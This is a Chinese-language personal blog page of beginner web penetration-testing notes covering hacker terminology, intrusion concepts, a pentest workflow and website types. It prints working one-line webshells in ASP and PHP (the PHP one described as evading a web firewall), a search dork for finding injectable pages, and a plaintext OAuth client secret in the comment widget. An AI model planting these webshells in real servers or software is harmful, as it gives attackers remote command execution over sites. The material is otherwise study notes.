<!DOCTYPE html>

<html lang="zh-CN">

<head>
  
  <title>Web参透基础笔记 - Hexo</title>
  <meta charset="UTF-8">
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5">
  
  

  <link rel="shortcut icon" href="/favicon.ico" type="image/png" />
  <meta name="description" content="学习Web安全技术基础知识">
<meta property="og:type" content="article">
<meta property="og:title" content="Web参透基础笔记">
<meta property="og:url" content="http://yoursite.com/2020/03/21/PY/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="学习Web安全技术基础知识">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-03-21T03:38:11.000Z">
<meta property="article:modified_time" content="2020-03-24T13:28:27.599Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="黑客">
<meta name="twitter:card" content="summary">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/gh/nexmoe/nexmoe.github.io@latest/css/style.css,npm/highlight.js@9.15.8/styles/atom-one-dark.css,gh/nexmoe/nexmoe.github.io@latest/lib/mdui_043tiny/css/mdui.css,gh/nexmoe/nexmoe.github.io@latest/lib/iconfont/iconfont.css" crossorigin>
  
  <!--<link rel="stylesheet" href="/css/style.css?v=1585056704257">-->

  
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="mdui-drawer-body-left">
  
  <div id="nexmoe-background">
    <div class="nexmoe-bg" style="background-image: url(https://cdn.jsdelivr.net/gh/nexmoe/nexmoe.github.io@latest/images/cover/5c3aec85a4343.jpg)"></div>
    <div class="mdui-appbar mdui-shadow-0">
      <div class="mdui-toolbar">
        <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon mdui-ripple"><i class="mdui-icon nexmoefont icon-menu"></i></a>
        <div class="mdui-toolbar-spacer"></div>
        <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
        <a href="/" title="John Doe" class="mdui-btn mdui-btn-icon"><img src="https://cdn.jsdelivr.net/gh/nexmoe/nexmoe.github.io@latest/images/avatar.png" alt="John Doe"></a>
       </div>
    </div>
  </div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="John Doe">
            <img src="https://cdn.jsdelivr.net/gh/nexmoe/nexmoe.github.io@latest/images/avatar.png" alt="John Doe" alt="John Doe">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>文章</span>3</div>
        <div><span>标签</span>2</div>
        <div><span>分类</span>2</div>
    </div>
    <div class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/about.html" title="关于博客">
            <i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
            <div class="mdui-list-item-content">
                关于博客
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/PY.html" title="我的朋友">
            <i class="mdui-list-item-icon nexmoefont icon-unorderedlist"></i>
            <div class="mdui-list-item-content">
                我的朋友
            </div>
        </a>
        
    </div>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <div class="nexmoe-widget nexmoe-search">
        <form id="search_form" action_e="https://cn.bing.com/search?q=site:nexmoe.com" onsubmit="return search();">
            <label><input id="search_value" name="q" type="search" placeholder="搜索"></label>
        </form>
    </div>
</div>
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">社交按钮</h3>
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://space.bilibili.com/20238211" target="_blank" mdui-tooltip="{content: '哔哩哔哩'}" style="color: rgb(231, 106, 141);background-color: rgba(231, 106, 141, .15);">
            <i class="nexmoefont icon-bilibili"></i>
        </a><a class="mdui-ripple" href="https://github.com/nexmoe/" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a>
    </div>
</div>
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章分类</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/SQL注入/">SQL注入</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/参透测试/">参透测试</a>
          <span class="category-list-count">1</span>
        </li>

        
      </ul>

    </div>
  </div>


  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">标签云</h3>
    <div id="randomtagcloud" class="nexmoe-widget tagcloud">
      <a href="/tags/%E5%8F%82%E9%80%8F%E6%B5%8B%E8%AF%95/" style="font-size: 10px;">参透测试</a> <a href="/tags/%E9%BB%91%E5%AE%A2/" style="font-size: 10px;">黑客</a>
    </div>
    
  </div>

  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">文章归档</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">三月 2020</a></li></ul>
    </div>
  </div>


  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2020 John Doe
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://nexmoe.com/hexo-theme-nexmoe.html" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-post">
  
      <div class="nexmoe-post-cover" style="padding-bottom: 54.166666666666664%;"> 
          <img data-src="https://cdn.jsdelivr.net/gh/suikastar/suikastar.github.io@latest/images/street_daytime.jpg" data-sizes="auto" alt="Web参透基础笔记" class="lazyload">
          <h1>Web参透基础笔记</h1>
      </div>
  
  
  <div class="nexmoe-post-meta" style="margin:10px 0!important;">
    <a><i class="nexmoefont icon-calendar-fill"></i>2020年03月21日</a>
    <a><i class="nexmoefont icon-areachart"></i>809 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 3 分钟</a>
</div>

  <div class="nexmoe-post-right">
    
      <div class="nexmoe-fixed">
        <div class="nexmoe-valign">
            <div class="nexmoe-toc">
                <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#学习Web安全技术基础知识"><span class="toc-number">1.</span> <span class="toc-text">学习Web安全技术基础知识</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#黑客传奇"><span class="toc-number">1.1.</span> <span class="toc-text">黑客传奇</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#黑客分类"><span class="toc-number">1.2.</span> <span class="toc-text">黑客分类</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#专业术语"><span class="toc-number">1.3.</span> <span class="toc-text">专业术语</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参透测试"><span class="toc-number">1.4.</span> <span class="toc-text">参透测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参透流程"><span class="toc-number">1.5.</span> <span class="toc-text">参透流程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#网站"><span class="toc-number">1.6.</span> <span class="toc-text">网站</span></a></li></ol></li></ol>
            </div>
        </div>
      </div>
    
  </div>

  <article>
    <p>学习Web安全技术基础知识</p>
<a id="more"></a>

<h1 id="学习Web安全技术基础知识"><a href="#学习Web安全技术基础知识" class="headerlink" title="学习Web安全技术基础知识"></a>学习Web安全技术基础知识</h1><h2 id="黑客传奇"><a href="#黑客传奇" class="headerlink" title="黑客传奇"></a>黑客传奇</h2><p>凯文  · 米特尼克</p>
<h2 id="黑客分类"><a href="#黑客分类" class="headerlink" title="黑客分类"></a>黑客分类</h2><p>黑客  骇客  红客</p>
<p>红客只有在中国才有的专门名称</p>
<p>Honcker ，中国特色的产物，早期出现于北约轰炸中国驻南联盟大之后。</p>
<p>白帽子    黑帽子（寻找漏洞）   灰帽子（制造漏洞）</p>
<h2 id="专业术语"><a href="#专业术语" class="headerlink" title="专业术语"></a>专业术语</h2><p>​    1、脚本（asp，php、jsp）</p>
<p>​    2、html（css，js，html）</p>
<p>​    3、HTTP协议</p>
<p>​    4、CMS（B/C）</p>
<p>​    5、MD5（加密技术，解密技术）</p>
<p>1、肉鸡：</p>
<p>​    被黑客入侵并长期驻扎的计算机或服务器（注入木马）</p>
<p>2、捉鸡：</p>
<p>​    利用使用大量的程序漏洞，使用自动化方式获取肉鸡的行为。</p>
<p>3、WebShell：</p>
<p>​    通过Web入侵的一种脚本工具，可以据此对网站服务进行一定程度的控制。</p>
<p>4、漏洞：</p>
<p>​    硬件、软件、协议等等的可利用安全缺陷，可能被攻击利用，对数据进行篡改，控制等。</p>
<p>5、一句话【木马】：</p>
<p>​    通过向服务器提交一句简短的代码，配合本地客户端实现webshell功能的木马。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;%<span class="keyword">eval</span> request(<span class="string">"pass"</span>)%&gt;</span><br><span class="line">&lt;%execute(request(<span class="string">"pass"</span>))%&gt;</span><br></pre></td></tr></table></figure>

<p>request(“pass”) 接收客户端提交的数据，pass为执行命令的参数值。</p>
<p>eval/execute        函数执行客户端命令的内容</p>
<p>注：过安全狗</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>($_POST[cracer]);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>通过小马上传大马</p>
<p>6、提权：</p>
<p>​    操作系统底权限的用户将自己提升为管理权限使用的方法。</p>
<p>7、后门：</p>
<p>​    黑客为了对主机进行长期的控制，在机器上种植一段程序或留下一个“入口”</p>
<p>8、跳板：</p>
<p>​    使用肉鸡IP来实施攻击其他目标，以便更好的隐藏自己的身份信息。</p>
<p>9、旁站入侵：</p>
<p>​    即同服务器下的网站入侵，入侵之后可以通过提权跨站目录等手段</p>
<p>​    拿到目标网站的权限。</p>
<p>​    常见的旁站查询工具：WebRobot、御剑、明小子和Web在线查询等。</p>
<p>10、C段入侵：</p>
<p>​    即同C段下服务器入侵。如目标ip为192.168.1.253入侵192.168.1.*的任意一台机器，</p>
<p>然后利用一些黑客工具嗅探获取在网络上传输的各种信息。常用的工具有：在Windows下有</p>
<p>Cain，在UNIX环境下有Sniffit，Snoop，Tcpdump，Dsniff等。</p>
<h2 id="参透测试"><a href="#参透测试" class="headerlink" title="参透测试"></a>参透测试</h2><p>黑盒测试：考验的是综合能力</p>
<p>思路与经验积累往往决定成败。</p>
<p>白盒测试：相对黑盒测试，白盒测试基本是从内部发起</p>
<p>APT攻击：</p>
<p>高级可持续攻击，是指组织（特别是政府）或者小团队利用先进的攻击手段对特定的目标进行长期持续性网络攻击的攻击手段。</p>
<p>​    1、极强的隐蔽性</p>
<p>​    2、潜伏期长，持续性强</p>
<p>​    3、目标性强</p>
<h2 id="参透流程"><a href="#参透流程" class="headerlink" title="参透流程"></a>参透流程</h2><p>明确目标–&gt;信息收集–&gt;漏洞探测–&gt;漏洞验证—&gt;形成报告—&gt;信息专利—&gt;获取所需—&gt;</p>
<p>信息分析</p>
<p>8个流程</p>
<h2 id="网站"><a href="#网站" class="headerlink" title="网站"></a>网站</h2><p>静态网站</p>
<p>​    .html结尾的都是静态网站</p>
<p>动态网站</p>
<p>​    .asp或.php或.aspx或.jsp</p>
<p>引擎：inur php? id=</p>
<p>伪静态网站：</p>
<p>​    表面看起来是静态的，但是其实是动态的</p>
<p>​    </p>

  </article>

  <div class="nexmoe-post-meta">
    
        <a class="nexmoefont icon-appstore-fill -link" href="/categories/%E5%8F%82%E9%80%8F%E6%B5%8B%E8%AF%95/">参透测试</a>
    
    
        <a class="nexmoefont icon-tag-fill -link" href="/tags/%E9%BB%91%E5%AE%A2/" rel="tag">黑客</a>
    
</div>

  <div class="nexmoe-post-footer">
    
      
  <div class="nexmoe-post-copyright">
    <strong>本文作者：</strong>John Doe<br>
    <strong>本文链接：</strong><a href="http://yoursite.com/2020/03/21/PY/" title="http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;03&#x2F;21&#x2F;PY&#x2F;" target="_blank" rel="noopener">http:&#x2F;&#x2F;yoursite.com&#x2F;2020&#x2F;03&#x2F;21&#x2F;PY&#x2F;</a><br>
    
      <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可
    
  </div>


    
    <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '80b2453b6d5f37ad6225',
        clientSecret: '43e99fa852795c9a7b3eb924b2558c64b84bbdeb',
        id: window.location.pathname,
        repo: 'nexmoe.github.io',
        owner: 'nexmoe',
        admin: 'nexmoe'
    })
    gitalk.render('gitalk')
</script>
</section>
  </div>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/combine/npm/lazysizes@5.1.0/lazysizes.min.js,gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js,npm/mdui@0.4.3/dist/js/mdui.min.js,gh/nexmoe/nexmoe.github.io@latest/js/app.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
<!--<script src="/js/app.js?v=1585056704260"></script>-->


    <script src="https://cdn.jsdelivr.net/gh/xtaodada/xtaodada.github.io@0.0.2/copy.js"></script>



  





</body>

</html>
